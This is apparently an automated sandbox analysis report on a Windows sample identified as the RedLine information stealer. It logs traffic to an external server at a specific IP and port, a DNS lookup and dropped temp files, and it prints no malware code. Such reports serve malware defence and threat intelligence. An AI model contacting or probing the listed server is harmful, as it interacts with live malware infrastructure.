Nov 17, 2024 03:07:14.204998970 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205010891 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205117941 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205128908 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205169916 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205180883 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205230951 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205241919 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205308914 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205321074 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205369949 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205380917 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205425024 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205436945 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205504894 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205516100 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205566883 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205578089 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205631018 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205642939 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205714941 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205725908 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205739021 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205791950 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205847025 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205890894 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205940962 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205951929 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206003904 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206015110 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206054926 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206075907 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206156015 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206167936 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206212044 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206223011 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206310034 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206321001 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206370115 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206382036 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206428051 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206501961 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206512928 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206526041 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206567049 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206610918 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206686974 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206697941 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206743956 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206756115 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206789970 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206865072 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206876993 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206888914 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.207231998 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.207243919 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.207659960 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.207672119 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.207922935 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.207933903 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208002090 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208044052 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208106995 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208118916 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208164930 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208177090 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208252907 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208264112 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208314896 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208374023 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208444118 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208456039 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208513975 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208524942 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208583117 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208595037 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208628893 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208650112 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208730936 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208775043 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208856106 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208867073 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208918095 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208929062 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209000111 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209011078 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209067106 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209079027 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209183931 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209194899 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209248066 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209259033 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209312916 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209323883 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209364891 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209377050 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209414959 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209435940 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209547997 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209559917 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209573030 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209634066 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209646940 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209686995 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209739923 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209772110 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209785938 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209796906 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209876060 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209887981 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209960938 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209973097 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210031033 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210042953 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210104942 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210117102 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210160017 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210181952 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210264921 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210285902 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210331917 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210371971 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210432053 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210443974 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210486889 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210498095 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210553885 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210566044 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210616112 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210627079 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210660934 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210695982 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210767031 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210778952 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210855961 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210867882 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210920095 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210978985 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210994005 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211042881 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211116076 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211127043 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211167097 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211213112 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211270094 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211282015 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211337090 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211420059 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211431980 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211442947 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211482048 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211493969 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211566925 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211577892 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211658001 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211707115 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211719036 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211775064 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211786032 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211854935 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211867094 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211914062 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211925030 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211937904 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211976051 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212034941 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212045908 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212084055 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212129116 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212178946 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212189913 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212256908 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212268114 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212287903 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212299109 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212349892 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212362051 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212382078 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212393045 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212445974 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212457895 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212469101 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212490082 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212501049 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212512970 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212532997 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212543964 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212554932 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212567091 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212587118 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212598085 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212619066 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212629080 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212649107 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212661028 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212681055 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212692022 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212704897 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212744951 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212779999 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212806940 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212829113 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212842941 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212862015 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212872982 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212883949 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212894917 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212914944 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212925911 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212946892 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212959051 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212970972 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.256872892 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:15.467576981 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:15.528460026 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:15.595179081 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:15.595650911 CET	49738	55615	192.168.2.4	45.137.22.126

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 17, 2024 03:07:08.826909065 CET	52844	53	192.168.2.4	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 17, 2024 03:07:08.826909065 CET	192.168.2.4	1.1.1.1	0x5ba4	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9dOKGgFNL2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9dOKGgFNL2.exe.log

C:\Users\user\AppData\Local\Temp\tmp4513.tmp

C:\Users\user\AppData\Local\Temp\tmp4514.tmp

C:\Users\user\AppData\Local\Temp\tmp4525.tmp

C:\Users\user\AppData\Local\Temp\tmp4526.tmp

C:\Users\user\AppData\Local\Temp\tmp4536.tmp

C:\Users\user\AppData\Local\Temp\tmp4537.tmp

C:\Users\user\AppData\Local\Temp\tmp4548.tmp

C:\Users\user\AppData\Local\Temp\tmp4549.tmp

C:\Users\user\AppData\Local\Temp\tmp455A.tmp

C:\Users\user\AppData\Local\Temp\tmp457A.tmp

C:\Users\user\AppData\Local\Temp\tmp457B.tmp

C:\Users\user\AppData\Local\Temp\tmp7E4F.tmp

C:\Users\user\AppData\Local\Temp\tmp7E5F.tmp

C:\Users\user\AppData\Local\Temp\tmp7E70.tmp

C:\Users\user\AppData\Local\Temp\tmp7E71.tmp

Windows Analysis Report
9dOKGgFNL2.exe